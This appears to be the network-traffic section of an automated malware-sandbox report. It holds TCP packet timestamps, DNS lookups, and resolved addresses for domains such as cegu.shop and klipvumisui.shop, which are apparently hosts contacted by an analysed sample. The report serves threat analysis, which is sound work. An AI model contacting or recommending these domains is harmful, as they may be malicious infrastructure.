                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.864394903 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.864398956 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.864439011 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.864640951 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.864656925 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.864696026 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.864700079 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.864728928 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.864866972 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.864892006 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.864901066 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.864903927 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.864921093 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.864949942 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.865161896 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.865180016 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.865220070 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.865222931 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.865236044 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.865262032 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.865391970 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.865406036 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.865462065 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.865467072 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.865504980 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.865667105 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.865684986 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.865726948 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.865731955 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.865761995 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.865768909 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.866065979 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.866084099 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.866147041 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.866151094 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.866190910 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.952873945 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.952898026 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.952930927 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.952936888 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.952970028 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.952987909 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.953145027 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.953161955 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.953200102 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.953203917 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.953222990 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.953241110 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.953460932 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.953481913 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.953519106 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.953522921 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.953543901 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.953552961 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.953605890 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.953648090 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.953658104 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.953661919 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.953697920 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.953794003 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.953809977 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.953846931 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.953850031 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.953860044 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.953885078 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.954087019 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.954103947 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.954138994 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.954143047 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.954165936 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.954184055 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.954350948 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.954364061 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.954402924 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.954406977 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.954426050 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.954432011 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.954643011 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.954657078 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.954691887 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.954694986 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.954725981 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:36.954732895 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.041492939 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.041533947 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.041552067 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.041557074 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.041565895 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.041579008 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.041582108 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.041611910 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.041616917 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.041639090 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.041831970 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.041846037 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.041883945 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.041891098 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.041915894 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.042258978 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.042269945 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.042306900 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.042310953 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.042340994 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.042387962 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.042403936 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.042434931 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.042439938 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.042457104 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.042737961 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.042752981 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.042793989 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.042798042 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.042814016 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.042920113 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.042936087 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.042996883 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.042996883 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.043000937 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.043144941 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.043158054 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.043205023 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.043209076 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.043216944 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.084207058 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.093163967 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.130072117 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.130095959 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.130131960 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.130136013 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.130167007 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.130179882 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.130259991 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.130283117 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.130331039 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.130336046 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.130373955 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.130431890 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.130455017 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.130491972 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.130496025 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.130517960 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.130527973 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.130786896 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.130801916 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.130837917 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.130841970 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.130875111 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.130882978 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131032944 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131051064 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131086111 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131089926 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131114006 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131127119 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131221056 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131233931 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131277084 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131280899 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131337881 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131550074 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131567001 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131603956 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131608009 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131633997 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131653070 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131858110 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131870985 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131910086 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131913900 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131942987 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.131942987 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.132143021 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.132174015 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.132194996 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.132199049 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.132220030 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.177946091 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.218986034 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219007969 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219055891 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219060898 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219094038 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219105959 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219183922 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219202995 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219249964 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219255924 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219290018 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219487906 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219507933 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219536066 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219540119 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219569921 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219579935 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219882011 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219897032 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219943047 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219945908 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219954014 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219970942 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219990969 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.219994068 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.220002890 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.220030069 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.220051050 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.220350027 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.220364094 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.220412970 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.220417023 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.220452070 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.220460892 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.220474005 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.220519066 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.220521927 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.220556974 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.220762968 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.220782995 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.220844984 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.220849991 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.220885992 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.259511948 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.308020115 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.308058023 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.308103085 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.308106899 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.308151007 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.308151960 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.308173895 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.308192968 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.308201075 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.308214903 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.308222055 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.308233976 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.308248043 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.308252096 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.308280945 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.308284998 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.308291912 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.308312893 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.308353901 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.348965883 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.386415005 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.386425018 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.386434078 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:37.386439085 CET44349746172.67.208.58192.168.2.4

                                                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                Dec 30, 2024 19:10:11.827198029 CET5616553192.168.2.41.1.1.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:11.839168072 CET53561651.1.1.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:29.106033087 CET6474553192.168.2.41.1.1.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:29.165052891 CET53647451.1.1.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:30.205308914 CET5656253192.168.2.41.1.1.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:30.218369007 CET53565621.1.1.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:30.817960024 CET5187353192.168.2.41.1.1.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:30.827205896 CET53518731.1.1.1192.168.2.4

                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                Dec 30, 2024 19:10:11.827198029 CET192.168.2.41.1.1.10x77a3Standard query (0)learningypr.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 30, 2024 19:10:29.106033087 CET192.168.2.41.1.1.10xc444Standard query (0)cegu.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 30, 2024 19:10:30.205308914 CET192.168.2.41.1.1.10xf942Standard query (0)klipvumisui.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 30, 2024 19:10:30.817960024 CET192.168.2.41.1.1.10x6973Standard query (0)dfgh.onlineA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                Dec 30, 2024 19:10:11.839168072 CET1.1.1.1192.168.2.40x77a3No error (0)learningypr.click104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 30, 2024 19:10:11.839168072 CET1.1.1.1192.168.2.40x77a3No error (0)learningypr.click104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 30, 2024 19:10:11.839168072 CET1.1.1.1192.168.2.40x77a3No error (0)learningypr.click104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 30, 2024 19:10:11.839168072 CET1.1.1.1192.168.2.40x77a3No error (0)learningypr.click104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 30, 2024 19:10:11.839168072 CET1.1.1.1192.168.2.40x77a3No error (0)learningypr.click104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 30, 2024 19:10:11.839168072 CET1.1.1.1192.168.2.40x77a3No error (0)learningypr.click104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 30, 2024 19:10:11.839168072 CET1.1.1.1192.168.2.40x77a3No error (0)learningypr.click104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 30, 2024 19:10:29.165052891 CET1.1.1.1192.168.2.40xc444No error (0)cegu.shop185.161.251.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 30, 2024 19:10:30.218369007 CET1.1.1.1192.168.2.40xf942No error (0)klipvumisui.shop172.67.208.58A (IP address)IN (0x0001)false
